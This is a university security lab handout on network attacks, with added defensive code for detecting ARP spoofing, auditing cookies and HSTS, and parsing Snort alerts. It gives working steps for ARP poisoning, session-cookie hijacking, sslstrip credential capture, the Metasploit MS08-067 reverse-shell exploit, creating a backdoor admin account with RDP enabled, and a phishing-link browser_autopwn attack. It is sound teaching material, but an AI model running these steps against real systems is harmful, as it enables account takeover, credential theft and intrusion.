network attacks - computer networks security laboratory
Cybernetics and Economic Informatics Faculty Information Security Master
Computer Networks Security Laboratory. Topic: Network Attacks
Adrian Furtun MSc, C|EH [email protected]
With great power comes great responsibility
Agenda
1. Interception of network traffic transmitted using a clear-text protocol (HTTP) => obtaining session cookies => using session cookies to enter a victim's web session
2. Interception of network traffic transmitted using an encrypted protocol (HTTPS) => obtaining username and password for web login
3. Scanning the Windows VM using nmap (+Snort disabled/enabled)
4. Scanning the Windows VM using Nessus (+Snort disabled/enabled)
5. Gaining access to the Windows VM by exploiting a network service vulnerability
6. Gaining access to a Windows machine with a client-side attack: => social engineering => exploit browser vulnerability => use Metasploit to own the machine
Network Attacks
2
Rules
It is forbidden:
- Any scanning / attack outside the laboratory network
- Any scanning / attack against your colleagues' machines or against the instructor's machine
Breaking these rules might lead to severe penalties
Administrative tasks
Connect to ftp://[email protected] (user: stud, password: stud)
Download:
- Course slides
- VMWare Player: VMware-player-3.1.3.exe
- Windows VM: winxpsp2_web_snort.zip
- Backtrack VM: bt4-final-vm.zip
Install VMWare Player
Unzip both virtual machines
Virtual machine configuration
Laboratory setup (1)
You will work in pairs (1 pair = 2 distinct computers): attacker and victim
- Victim machine = host machine
- Attacker machine = Backtrack VM
Start Backtrack [ username: root, password: toor ]
Open graphic mode: startx &
Set the network card to bridged mode!
Obtain an IP address: dhclient eth0
Laboratory setup (2)
Exercise 1
Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail account
The victim needs a valid Yahoo mail account (a test account)
The victim will open a web mail session
The attacker:
1. Becomes MITM
2. Captures the network traffic of the victim and extracts the necessary data
Exercise 1 cont.
Attacker machine: become MITM and intercept all traffic sent by the Victim to the Gateway. View the traffic using Wireshark.
1. Find the IP addresses of the Victim and the Gateway
2. Activate the routing process in Backtrack: echo 1 > /proc/sys/net/ipv4/ip_forward
3. Inform the Victim that the Gateway's MAC address is the attacker's MAC address (ARP poisoning using ARP replies): arpspoof -i eth0 -t IP_Victim IP_Gateway
4. View the network traffic of the Victim using Wireshark
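A defender-side counterpart to step 3, added here and not part of the lab material: a small Python detector that flags the symptom the ARP poisoning step leaves on the segment, namely the gateway IP being announced with a second MAC address. The ARP records and addresses are constructed samples; on a real host they would be fed from arpwatch output or a packet capture.

```python
from collections import defaultdict

# Constructed sample of ARP replies seen on the lab segment (sender IP, sender MAC);
# not a real capture. The gateway IP is announced a second time with the attacker's
# MAC, which is exactly what the arpspoof step produces on the victim's segment.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:55"),   # real gateway
    ("192.168.1.10", "aa:bb:cc:dd:ee:01"),  # victim
    ("192.168.1.20", "aa:bb:cc:dd:ee:02"),  # attacker host
    ("192.168.1.1", "aa:bb:cc:dd:ee:02"),   # gateway IP claimed by the attacker's MAC
    ("192.168.1.1", "aa:bb:cc:dd:ee:02"),   # the poison is repeated periodically
]

def detect_arp_poisoning(replies, trusted=None):
    """Walk ARP replies in order and return a de-duplicated list of alerts.

    An alert is raised when an IP already bound to one MAC is announced with
    another ("changed_binding"), or when one MAC claims more than one IP
    ("mac_claims_many"). `trusted` optionally seeds the table with static
    bindings, e.g. the gateway, so the very first poisoned reply is caught.
    """
    table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ips_per_mac = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = table.get(ip)
        if known is None:
            table[ip] = mac
        elif known != mac:
            alert = ("changed_binding", ip, known, mac)
            if alert not in alerts:
                alerts.append(alert)
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > 1:
            alert = ("mac_claims_many", mac, tuple(sorted(ips_per_mac[mac])))
            if alert not in alerts:
                alerts.append(alert)
    return alerts

if __name__ == "__main__":
    gateway = {"192.168.1.1": "00:11:22:33:44:55"}  # static binding a host can pin
    for a in detect_arp_poisoning(SAMPLE_ARP_REPLIES, trusted=gateway):
        print(a)
```

The same symptom is what a static ARP entry for the gateway on the victim, or Dynamic ARP Inspection on the switch, prevents outright.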
Exercise 1 cont.
Find the session cookies of the Victim and use them to enter his email session
1. Wireshark -> Follow TCP stream on a TCP packet sent by the Victim
2. Copy the cookies Y and T into a text file
3. Install the Firefox plugin Add N Edit Cookies
4. Open a Yahoo mail session of your own (attacker)
5. Use the plugin to edit your cookies and replace Y and T with the ones of the Victim
6. Refresh the web page
Exercise 2
Intercept network traffic during an HTTPS session. Find the username and password of the Victim.
1. Make yourself MITM (see exercise 1)
2. Start SSLSTRIP and make it listen on port 1234: sslstrip -l 1234 -s -w traffic.log
   More details here: http://www.thoughtcrime.org/software/sslstrip/
3. Configure IPTABLES to redirect HTTP traffic to SSLSTRIP: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234
4. The victim accesses a web site using HTTPS (e.g. Yahoo login)
5. Extract the useful information from the file traffic.log
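An added, defender-side example covering exercises 1 and 2 (not from the lab material): both succeed because the site still answers over plain HTTP and accepts its session cookies there. The Python check below inspects response headers for the two controls that close that gap, the Secure (and HttpOnly) cookie attributes and a Strict-Transport-Security header that stops the browser from ever following a stripped http:// link again. The two responses, the cookie values and the 180-day max-age threshold are our own constructed assumptions.

```python
import re

# Constructed response header blocks (not captured from Yahoo): the first mirrors the
# weak setup the two exercises rely on, the second the hardened equivalent.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: Y=v=1&n=abc; path=/; domain=.example.com\r\n"
    "Set-Cookie: T=z=xyz; path=/; domain=.example.com\r\n\r\n"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: Y=v=1&n=abc; path=/; domain=.example.com; Secure; HttpOnly\r\n"
    "Set-Cookie: T=z=xyz; path=/; domain=.example.com; Secure; HttpOnly\r\n\r\n"
)
MIN_HSTS_AGE = 180 * 24 * 3600  # baseline of 180 days (our assumption)

def headers_of(raw):
    """Return [(name_lowercased, value)] from the header block of a raw response."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")[1:]
    return [(n.strip().lower(), v.strip()) for n, v in
            (line.split(":", 1) for line in head if ":" in line)]

def audit_response(raw):
    """List the properties that let cookies be sniffed over HTTP (Ex. 1) or the
    HTTPS login be downgraded by sslstrip (Ex. 2). Empty list = nothing found."""
    headers = headers_of(raw)
    findings = []
    hsts = [v for n, v in headers if n == "strict-transport-security"]
    if not hsts:
        findings.append("no Strict-Transport-Security: browser will follow plain-HTTP links")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0], re.I)
        if not m or int(m.group(1)) < MIN_HSTS_AGE:
            findings.append("HSTS max-age missing or shorter than %d s" % MIN_HSTS_AGE)
        if "includesubdomains" not in hsts[0].lower():
            findings.append("HSTS without includeSubDomains")
    for n, v in headers:
        if n != "set-cookie":
            continue
        name = v.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in v.split(";")[1:]}
        if "secure" not in attrs:
            findings.append("cookie %s lacks Secure: also sent over plain HTTP" % name)
        if "httponly" not in attrs:
            findings.append("cookie %s lacks HttpOnly" % name)
    return findings
```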
About Snort
http://www.snort.org/assets/166/snort_manual.pdf
- Network-based IDS
- Open source (free); Sourcefire commercial version (appliance): http://www.sourcefire.com/
- Portable (Linux, Windows, MacOS X, Solaris, BSD, HP-UX, etc.)
- Multiple mechanisms for intrusion detection: signatures (rules, e.g. www.bleedingsnort.com), statistical anomalies, protocol anomalies
About Snort cont.
Snort running modes:
- Sniffer mode (like tcpdump): snort.exe -v -d -e
- Packet logger: snort.exe -vde -l ..\log
- NIDS: snort.exe -d -l ..\log -c ..\etc\snort.conf
[Figure: Snort data flow. Packet Stream -> Sniffing -> Packet Decoder -> Preprocessor (plug-ins) -> Detection Engine (plug-ins) -> Output Stage (plug-ins) -> Alerts/Logs]
Nmap briefings
- TCP connect() scan: nmap -sT
- TCP SYN scan: nmap -sS
- UDP scan: nmap -sU
- Ping scan: nmap -sP
- TCP FIN / Xmas Tree / Null scan: nmap -sF / -sX / -sN
- Version detection: nmap -sS -sV
- OS fingerprinting: nmap -sS -O
Example: $ nmap -sS -sV -O -F -n 192.168.1.1
Change setup
Start the Windows VM
New attack direction: Backtrack -> Windows VM
Exercise 3
Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).
Obtain the following information (from a single scan):
- Live hosts
- Open TCP ports
- Service version
- Operating system
- Save all output in a text file
Hints: nmap -h, man nmap
Exercise 3 cont.
Check if the scanning can be detected by a NIDS (Snort)
1. Authenticate to the Windows VM (password: user)
2. Start Snort: cmd.exe -> cd c:\snort\bin, then snort.exe -d -l ..\log -c ..\etc\snort.conf -A console
3. Perform the scanning again using Nmap
4. Any alert? (see c:\Snort\log\alert.ids)
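To make step 4 concrete, an added Python example (not part of the lab material) that parses the one-line "fast" alert format that snort -A console prints and reports which source addresses produced reconnaissance alerts. The alert lines, timestamps, addresses and rule SIDs are constructed samples, and the keyword heuristic in scan_sources is our own, not a Snort feature.

```python
import re
from collections import Counter

# Constructed lines in the one-line "fast" alert format (not a real alert.ids from
# the lab VM); addresses, timestamps and rule SIDs are illustrative only.
SAMPLE_ALERTS = """\
11/06-10:13:55.170263  [**] [1:469:3] ICMP PING NMAP [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.168.1.20 -> 192.168.1.10
11/06-10:13:55.201114  [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} 192.168.1.20 -> 192.168.1.10
11/06-10:13:56.004512  [**] [1:1421:11] SNMP AgentX/tcp request [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.1.20:44210 -> 192.168.1.10:705
11/06-10:14:02.330001  [**] [1:2003:8] MS-SQL Worm propagation attempt [**] [Classification: Misc Attack] [Priority: 2] {UDP} 192.168.1.77:1434 -> 192.168.1.10:1434
"""

# timestamp [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {proto} src[:port] -> dst[:port]
ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]\s+(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?$"
)

def parse_alerts(text):
    """Parse fast-format alert lines into dicts; lines that do not match are skipped."""
    out = []
    for line in text.splitlines():
        m = ALERT_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["prio"] = int(rec["prio"])
            out.append(rec)
    return out

SCAN_WORDS = ("portscan", "nmap", "scan")  # our own heuristic, not a Snort concept

def scan_sources(alerts, min_hits=2):
    """Return {src_ip: count} for sources with at least `min_hits` reconnaissance
    alerts: sfPortscan preprocessor output (gid 122) or rule messages naming a scan."""
    hits = Counter(
        a["src"] for a in alerts
        if a["gid"] == "122" or any(w in a["msg"].lower() for w in SCAN_WORDS)
    )
    return {ip: n for ip, n in hits.items() if n >= min_hits}
```

The default alert.ids written by the command in step 2 uses the multi-line "full" format; point parse_alerts at console output, or run Snort with -A fast, to get the one-line form handled here.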
Exercise 4
Scan the victim machine using Nessus to find vulnerabilities
1. First install Nessus on BackTrack: download Nessus (for Ubuntu 9.10 32 bit) from http://www.tenable.com, then dpkg -i Nessus-4.4.1-ubuntu910_i386.deb
2. Then obtain a Nessus activation code (Home Feed): http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed
3. Configure the Nessus server:
   - Add a Nessus user: /opt/nessus/sbin/nessus-adduser
   - Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE
   - Start the Nessus server: /etc/init.d/nessusd start
4. Start the Nessus client: https://127.0.0.1:8834
Exercise 4 cont.
Sample vulnerability:
1. Create a scan policy
2. Select plugins
3. Set target
4. Run scan
About Metasploit
Framework for writing and executing exploits
Modules: Exploits, Auxiliary, Payloads, Encoders, Nops
User interfaces:
- console: msfconsole
- GUI: msfgui
Updates: cd /pentest/exploits/framework3, then svn update
Select Exploit -> Configure options + payload -> Run exploit -> Execute payload
Tutorial: http://www.offensive-security.com/metasploit-unleashed
Exercise 5
We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to the Victim machine
1. cd /pentest/exploits/framework3
2. ./msfconsole
3. help
4. search ms08-067
5. use exploit/windows/smb/ms08_067_netapi
6. show options
7. show payloads
8. set RHOST, LHOST, PAYLOAD, TARGET = 3, etc. (for payload use windows/shell/reverse_tcp)
9. exploit
10. Execute Windows commands in the obtained shell (e.g. ipconfig, hostname)
Exercise 5 cont.
Obtain Remote Desktop access to the Victim machine:
- Add a new user: net user myuser mypassword /add
- Add the new user to the local Administrators group: net localgroup Administrators myuser /add
- Start the Remote Desktop service: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Check if the victim has opened the port for Remote Desktop (use nmap)
- Connect to the victim machine using: rdesktop 192.168.x.x &
What if?
- Victim has all ports closed (firewall)
- Operating system is patched
Answer: attack client applications and plugins (web browser, Acrobat Reader, MS Office, etc.)
Change setup
- Start the firewall of the Windows VM
- Disable any exceptions
- Use nmap to verify that there are no more open ports
Exercise 6
Exploit a browser vulnerability to gain remote access. Use Metasploit and browser autopwn.
1. cd /pentest/exploits/framework3
2. ./msfconsole
3. use auxiliary/server/browser_autopwn
4. set LHOST 192.168.x.x (attacker IP)
5. set SRVPORT 80
6. set URIPATH mypictures.html
7. exploit
Exercise 6 cont.
- Send the victim an email containing the link: http://192.168.x.x/mypictures.html
- Victim clicks the link
- Attacker obtains a meterpreter session
Other useful tools
- Ettercap: http://ettercap.sourceforge.net
- Cain&Abel: http://www.oxid.it/cain.html
- The Middler: http://inguardians.com/tools
Q&A
?